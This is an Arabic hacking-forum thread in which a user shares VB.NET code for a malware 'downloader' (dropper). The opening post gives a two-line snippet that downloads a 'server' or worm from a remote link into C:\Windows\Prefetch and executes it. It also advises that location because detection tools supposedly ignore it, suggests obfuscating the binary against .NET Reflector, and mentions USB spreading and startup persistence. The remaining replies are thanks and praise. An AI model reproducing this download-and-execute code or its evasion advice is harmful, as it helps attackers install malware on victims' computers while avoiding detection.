• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع samo dz
  • تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
غير متصل

إنضم
18 أكتوبر 2014
المشاركات
70
الإعجابات
4
النقاط
30
الإجابات المقدمة: 0
#1
ساطرح هدا الكود لدواندولر vb.net بحجم 12kb بعد ان تنزع الايقونة لدي برنامجي dowandoler مع خاصية usb spred و add to startup لكن لن اطرحه حتى لا يقولون ملغم لهدا بدات اضع الاكوادشرح الكود : الكود يقوم بتحميل الرابط المباشر لسيرفرك او اي شيء اخر الى الملف الدي تختاره انت اظن ان عليك ان تختار C:\Windows\Prefetch لان كاشف التلغيم لن يفكر في ملف preftch كمسار للنزول شفر الدواندولر حتى لا يمكن تحليله ب.net reflector
يمكنك ان تضيف الكود في الفورم او الكلاس او بوتون
كود:
 My.Computer.Network.DownloadFile("رابط المباشر للسيرفر او الدودة", "C:\Windows\Prefetch\server.exe")
        Process.Start("C:\Windows\Prefetch\server.exe")
ادا واجهتم مشكلة في الكود اسالني
ارجو التفييم حتى اصعد في الرتبة و افيدكم اكتر
 


غير متصل

إنضم
20 يوليو 2012
المشاركات
79
الإعجابات
1
النقاط
30
الإقامة
الرياض ّ!
الإجابات المقدمة: 0
#2
رد: برمج دواندولر بنفسك لاي صيغة vb.net

ممكن شرح مصور حبيبي
 


غير متصل

إنضم
18 أكتوبر 2014
المشاركات
70
الإعجابات
4
النقاط
30
الإجابات المقدمة: 0
#3
رد: برمج دواندولر بنفسك لاي صيغة vb.net

هل لديك visual basic
 


غير متصل

إنضم
28 أكتوبر 2014
المشاركات
3
الإعجابات
0
النقاط
5
الإجابات المقدمة: 0
#4
رد: برمج دواندولر بنفسك لاي صيغة vb.net

:{1!}: شكرا اخي العزيز على الافادة
{1!@}​
 


غير متصل

مراقب عآم
إنضم
26 مايو 2013
المشاركات
1,633
الإعجابات
113
النقاط
505
العمر
29
الإقامة
DZ
الإجابات المقدمة: 0
#5
رد: برمج دواندولر بنفسك لاي صيغة vb.net

السلام عليكم ورحمة الله
بوركت اخي سامو
يعطيك الصحة​
 


غير متصل

إنضم
19 مايو 2012
المشاركات
53
الإعجابات
1
النقاط
30
الإقامة
im Syrian
الإجابات المقدمة: 0
#6
رد: برمج دواندولر بنفسك لاي صيغة vb.net

مشكور اخي جاري التجربه {1$0}
 


غير متصل

مراقب عآم
إنضم
20 يوليو 2014
المشاركات
912
الإعجابات
681
النقاط
515
الإجابات المقدمة: 0
#7
رد: برمج دواندولر بنفسك لاي صيغة vb.net

احسنت مبدع
 


غير متصل

Ameer Eagle

V.I.P

V • I • P
إنضم
7 يونيو 2014
المشاركات
2,922
الإعجابات
2,778
النقاط
555
الإقامة
IraQ
الإجابات المقدمة: 0
#8
رد: برمج دواندولر بنفسك لاي صيغة vb.net

السلام عليكم ورحمة الله ...
عاشت الايادي بارك الله بيك
وبالنسبة الى البرنامج اخي لا تقلق كان هنالك سوء فهم صغير حصل ولقدد قم اصلاحه والحمد لله لهذا تابع طريقك يا غالي موفق
 


غير متصل

موقوف لمخالفة الشروط
إنضم
8 أكتوبر 2014
المشاركات
79
الإعجابات
5
النقاط
30
الإجابات المقدمة: 0
#9
رد: برمج دواندولر بنفسك لاي صيغة vb.net

يعطيكك الفف عافيةة اخوي سآموو ~

واذا كنت زعلان علي انا اسسف جدآ

ً#ٌ5oًًًُ.:{11}:
 


غير متصل

slaizer

مشرف أختبار الأختراق

V • I • P
إنضم
29 يوليو 2014
المشاركات
594
الإعجابات
558
النقاط
515
الإجابات المقدمة: 0
#10
رد: برمج دواندولر بنفسك لاي صيغة vb.net

مبدع
 


الحالة
مغلق و غير مفتوح للمزيد من الردود.
الوسوم - Tag الوسوم - Tag
برمج دواندولر بنفسك لاي صيغة vb.net